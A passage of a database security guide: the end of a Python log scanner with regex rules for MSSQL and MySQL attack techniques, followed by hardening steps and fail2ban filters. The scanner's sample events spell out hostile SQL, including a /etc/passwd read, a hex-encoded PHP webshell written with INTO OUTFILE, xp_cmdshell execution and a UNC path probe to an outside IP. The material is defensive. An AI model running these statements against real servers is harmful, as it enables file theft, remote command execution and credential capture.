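    ("mssql_xp_cmdshell", "high", r"\bxp_cmdshell\b"),
    ("mssql_enable_dangerous_option", "high",
     r"sp_configure\s+'(xp_cmdshell|ole automation procedures|show advanced options)'\s*,\s*1\b"),
    ("mssql_unc_path_probe", "high", r"\bxp_(dirtree|subdirs|fileexist)\b.*'\\\\"),
    ("mssql_impersonation", "medium", r"\bexecute\s+as\s+login\b"),
    ("mssql_linked_server_exec", "medium", r"\bexec\s*\(.*\)\s*at\s*\["),
    ("mssql_ole_automation", "high", r"\bsp_oa(create|method)\b"),
    ("mssql_file_read", "medium", r"\bopenrowset\s*\(\s*bulk\b"),
    ("mssql_hash_dump", "medium", r"\bsys\.sql_logins\b"),
    ("mysql_file_read", "medium", r"\bload_file\s*\("),
    ("mysql_file_write", "high", r"\binto\s+(out|dump)file\b"),
    ("mysql_udf_load", "high", r"\bcreate\s+function\b.*\bsoname\b"),
    ("mysql_udf_exec", "high", r"\bsys_(exec|eval)\s*\("),
    ("backdoor_privileges", "high",
     r"\bgrant\s+all\s+privileges\s+on\s+\*\.\*|\balter\s+server\s+role\s+\[?sysadmin\]?\s+add\s+member\b"),
    ("webshell_marker", "high", r"<\?php\b.*\b(system|exec|passthru|shell_exec)\s*\(|wscript\.shell"),
]
COMPILED = [(n, s, re.compile(p, re.IGNORECASE | re.DOTALL)) for n, s, p in RULES]
HEX_LITERAL = re.compile(r"\b0x([0-9a-f]{2,})\b", re.IGNORECASE)


def expand_hex_literals(stmt):
    """Append the ASCII decoding of every 0x... literal inside a comment, so a
    hex-encoded payload is visible to the keyword rules."""
    decoded = []
    for h in HEX_LITERAL.findall(stmt):
        if len(h) % 2 == 0:
            try:
                decoded.append(bytes.fromhex(h).decode("ascii"))
            except ValueError:          # odd bytes or non-ASCII content: not a text payload
                continue
    return stmt if not decoded else stmt + " /*hex:" + " ".join(decoded) + "*/"


def scan_statement(stmt):
    """Return [(rule, severity)] for every rule that matches the statement."""
    text = re.sub(r"\s+", " ", expand_hex_literals(stmt))
    return [(n, s) for n, s, rx in COMPILED if rx.search(text)]


def scan_events(events):
    """Attach matched rules and an overall severity to each event that hits."""
    findings = []
    for ev in events:
        hits = scan_statement(ev["statement"])
        if hits:
            sev = "high" if any(s == "high" for _, s in hits) else "medium"
            findings.append({**ev, "rules": [n for n, _ in hits], "severity": sev})
    return findings


# Constructed sample events (not real log data); for MySQL the fields mirror the
# user_host and argument columns of mysql.general_log.
SAMPLE_EVENTS = [
    {"source": "mysql", "user": "webapp@10.10.10.22", "statement": "SELECT id, name FROM products WHERE id = 42"},
    {"source": "mysql", "user": "root@10.10.14.5", "statement": "SELECT LOAD_FILE('/etc/passwd')"},
    {"source": "mysql", "user": "root@10.10.14.5", "statement":
     "SELECT 0x3C3F7068702073797374656D28245F4745545B22636D64225D293B203F3E INTO OUTFILE '/var/www/html/shell.php'"},
    {"source": "mysql", "user": "root@10.10.14.5", "statement": "CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so'"},
    {"source": "mssql", "user": "sa", "statement": "EXEC sp_configure 'xp_cmdshell', 1"},
    {"source": "mssql", "user": "sa", "statement": "EXEC xp_cmdshell 'whoami'"},
    {"source": "mssql", "user": "webapp", "statement": "EXEC master..xp_dirtree '\\\\10.10.14.5\\share\\'"},
    {"source": "mssql", "user": "webapp", "statement": "EXECUTE AS LOGIN = 'sa'"},
    {"source": "mssql", "user": "reporting", "statement": "SELECT TOP 10 * FROM sales.dbo.orders"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f["severity"], f["source"], f["user"], f["rules"])
```

Seven of the nine constructed events hit; the hex-encoded INTO OUTFILE statement is flagged twice, once for the file write and once for the decoded `<?php system(` marker, which a plain keyword grep would have missed.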

Hardening Database Servers

MySQL Hardening

# Run mysql_secure_installation (sets the root password, removes anonymous users and the test database)
sudo mysql_secure_installation

-- In the mysql client: disable remote root access
DELETE FROM mysql.user WHERE User='root' AND Host NOT IN ('localhost', '127.0.0.1', '::1');
FLUSH PRIVILEGES;

-- Remove anonymous users
DELETE FROM mysql.user WHERE User='';
FLUSH PRIVILEGES;

-- Remove test database
DROP DATABASE IF EXISTS test;

-- Disable LOCAL INFILE at runtime (persist it in the config file below)
SET GLOBAL local_infile = 0;

# /etc/mysql/mysql.conf.d/mysqld.cnf (restart mysqld after editing):
[mysqld]
# Bind to localhost only
bind-address = 127.0.0.1
# Restrict file operations. secure_file_priv is read-only at runtime, so it can only be
# set here; SET GLOBAL secure_file_priv fails with "read only variable".
secure_file_priv = /var/lib/mysql-files/
# Enforce TLS for TCP connections
require_secure_transport = ON
# Keep LOCAL INFILE off across restarts
local_infile = 0

MSSQL Hardening

-- Disable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 0;
GO
RECONFIGURE;
GO

-- Disable OLE Automation
EXEC sp_configure 'Ole Automation Procedures', 0;
GO
RECONFIGURE;
GO

-- Disable remote connections (if not needed)
EXEC sp_configure 'remote access', 0;
GO
RECONFIGURE;
GO

-- Enforce a strong password on sa first, then rename it: after the rename the
-- login is no longer addressable as 'sa', so the order matters
ALTER LOGIN sa WITH PASSWORD = 'C0mpl3x!P@ssw0rd2025', CHECK_POLICY = ON;
GO
ALTER LOGIN sa WITH NAME = [admin_backup_2023];
GO

-- Remove unnecessary permissions
REVOKE CONTROL SERVER FROM [public];
GO

-- Audit login attempts. The audit object alone records nothing; a server audit
-- specification selects the login action groups to capture.
CREATE SERVER AUDIT [LoginAudit]
TO FILE (FILEPATH = 'C:\SQLAudit\');
GO

CREATE SERVER AUDIT SPECIFICATION [LoginAuditSpec]
FOR SERVER AUDIT [LoginAudit]
ADD (FAILED_LOGIN_GROUP),
ADD (SUCCESSFUL_LOGIN_GROUP)
WITH (STATE = ON);
GO

ALTER SERVER AUDIT [LoginAudit] WITH (STATE = ON);
GO

Network Security

# Firewall rules - restrict to specific IPs
# MySQL
sudo ufw allow from 10.10.10.0/24 to any port 3306

# MSSQL
sudo ufw allow from 10.10.10.0/24 to any port 1433

# Use VPN or SSH tunneling for remote access
ssh -L 3306:localhost:3306 user@mysql-server
ssh -L 1433:localhost:1433 user@mssql-server

Intrusion Detection

# fail2ban for MySQL: the mysqld-auth filter ships with fail2ban and matches
# "Access denied for user" entries, so logpath points at the MySQL error log
# /etc/fail2ban/jail.local
[mysqld-auth]
enabled = true
port = 3306
filter = mysqld-auth
logpath = /var/log/mysql/error.log
maxretry = 3
bantime = 3600

# Monitor for SQL injection patterns in the web server access log
# (case-insensitive, since the payloads above are typically upper-case)
# /etc/fail2ban/filter.d/sql-injection.conf
[Definition]
failregex = (?i)^<HOST>.*?(union.*select|information_schema|load_file|into outfile)
ignoreregex =

# A jail that applies the filter; adjust logpath to your web server's access log
# /etc/fail2ban/jail.local
[sql-injection]
enabled = true
port = http,https
filter = sql-injection
logpath = /var/log/apache2/access.log
maxretry = 2
bantime = 3600
